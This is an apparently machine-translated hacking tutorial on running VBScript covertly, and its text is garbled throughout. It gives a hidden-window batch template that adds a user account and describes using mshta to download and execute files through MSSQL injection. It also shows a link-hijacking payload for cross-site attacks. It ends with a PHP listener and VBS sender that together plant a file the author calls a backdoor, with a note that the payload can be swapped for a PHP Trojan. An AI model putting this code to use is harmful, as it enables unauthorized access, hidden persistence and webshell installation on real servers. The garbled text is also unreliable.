This component can be used by default on xp and 2003. After being called, you can hear an old man talking on the computer. Like this code: ● CreateObject ("SAPI. SpVoice"). Speak "I love you" ●, save it as the vbs suffix, and then double-click it to hear that I LOVE YOU. But then we will discuss another question: how to run the vbs code without saving it as a vbs or a vbe suffix.
1. Use mshta to run vbs
The HTA file is also a system permission after it is run, and it is called by the client named mshta.exe. Run the following code in cmd: ● mshta vbscript: createobject ("sapi. spvoice "). speak ("I LOVE YOU. ") (window. close) ●, you will also hear the same pronunciation. This line of code is similar to generating an hta file temporarily, then running the vbs code inside, and then calling window. close to close the running window. The hta window is invisible throughout the running process. What do you think of in this running mode? At least I thought of two. One is the hidden operation of batch processing. The basic code is as follows:
★
@ Echo off
If "% 1" = "h" goto begin
Mshta vbscript: createobject ("wscript. shell"). run ("% ~ Nx0 h ", 0) (window. close) & exit
: Begin
Rem started to write the batch code below
Net user lcx 12345/add
★
This code can only be run by double-clicking. You cannot see the specific batch processing process during running. The second thing I want is the purpose of the injection process. There is a widely spread article on the Internet, "how to solve the problem of multiple echo calls to parameters in mssql injection", the central idea is to connect the vbs statement with a colon and write it to the injected zombie once with the echo command, and then call this vbs command to download the file. If you call mshta for execution, download and execute it once. However, using mshta in the command line directly follows the vbs code and there is a difficult problem to handle: space, but this is a good solution. Using execute to put the vbs code in brackets, it will be OK, this reader can give it a try. I believe it is not difficult for me.
2. Run vbs In the ie Address Bar
Many people use the ie address bar to run js. In fact, vbs is the same. We can open a website and enter vbscript: msgbox (Document. links. length) and press enter to view the number of connections on the current page. If document. links (I). href is used, the link addresses of different natural numbers such as 0, 1, 2, and 3 are displayed. This part actually involves dhtml content. Let's take a look at the simplest sample code:
★
<A href = http://www.sohu.com> www.sohu.com </a>
<A href = http://www.baidu.com> www.baidu.com </a>
★
These are two links. After you save them as a webpage, you will jump to different pages. If there is a cross-site attack on this page, I want to break it down and ask the user to click www.sohu.com but go to the page I specified to do it? Actually, you only need to add a line of statements. The code is: ● <body onload = 'vbscript: document. links (0 ). href = "http://www.google.com": document. links (0 ). innerHTML = "www.sohu.com" '> ●. In this case, the user clicks sohu again and will actually go to google, but the layout of the original page is not damaged. The same dhtml element also contains document. links (I ). href, document. images (I ). src, document. forms (I ). actions and so on. It is fun to change the dynamic elements of a website.
3. Call external components to run vbs
Vbs has limited functions, but can interact with external users. If you use vbs to simulate nc packet sending, you need to call the vb component. Zzzevazzz makes it clear about how VBS successfully calls MSWinsock. Winsock. Download Winsock. ocs registration, and import the. reg of the VB6 control Authorization key to the Registry. You can download the two files at http://zzzevazzz.bokee.com/inc/vb6controls.rar. Recently I learned php for a while. I saw a php listener on the Internet and can use it as a backdoor. The code for s. php ON THE send is as follows:
★
<?
// Set some basic variables
$ Host = "192.168.8.100 ";
$ Port = 12345;
// Set the timeout value
Set_time_limit (0 );
// Create a Socket
$ Socket = socket_create (AF_INET, SOCK_STREAM, 0) or die ("cocould not create
Socket \ n ");
// Bind the Socket to the port
$ Result = socket_bind ($ socket, $ host, $ port) or die ("cocould not bind
Socket \ n ");
// Start listening Link
$ Result = socket_listen ($ socket, 3) or die ("cocould not set up socket
Listener \ n ");
// Accept incoming connections
// Another Socket for communication
$ Spawn = socket_accept ($ socket) or die ("cocould not accept incoming
Connection \ n ");
// Obtain client input
$ Input = socket_read ($ spawn, 1024) or die ("cocould not read input \ n ");
// Clear the input string
$ Input = trim ($ input); // write the input result to OK. php.
Fputs (fopen ('OK. php', 'a +'), "$ input ");
// Process client input and return results
$ Output = strrev ($ input). "\ n ";
Socket_write ($ spawn, $ output, strlen ($ output) or die ("cocould not write
Output \ n ");
// Disable sockets
Socket_close ($ spawn );
Socket_close ($ socket );
?>
★
Open this php in ie, and the server that runs it will listen to port 12345. If we use vbs to send packets to port 12345, OK. php will be generated in the php Directory of the same file. The content of the package is the code for writing OK. php. The vbs file c. vbs code is as follows:
★
Set ie = WScript. CreateObject ("InternetExplorer. Application ")
Ie. visible = false
Ie. Navigate "http: // 192.168.8.100/s. php"'s. php is the server
While ie. Busy
WScript. Sleep 100
Wend
Do
Wscript. Sleep 200
Loop Until ie. ReadyState = 4
Set socket = WScript. CreateObject ("MSWinsock. Winsock ")
Socket. Protocol = 0
Socket. RemotePort = "12345" 'Port
Socket. RemoteHost = "192.168.8.100" 'host
Socket. connect socket. RemoteHost, socket. RemotePort
WScript. sleep 10
Ddd = "<? Phpinfo ();> "& Chr (13) 'Here you can change it to a php Trojan
Socket. SendData ddd
WScript. sleep 100
Wscript. echo "OK"
'Socket. senddata Chr (13)
Socket. close
Set ie = nothing
★
A vbs is combined with a php script to create an unconventional backdoor. Of course, this backdoor is of little value, but the important thing is the idea, isn't it?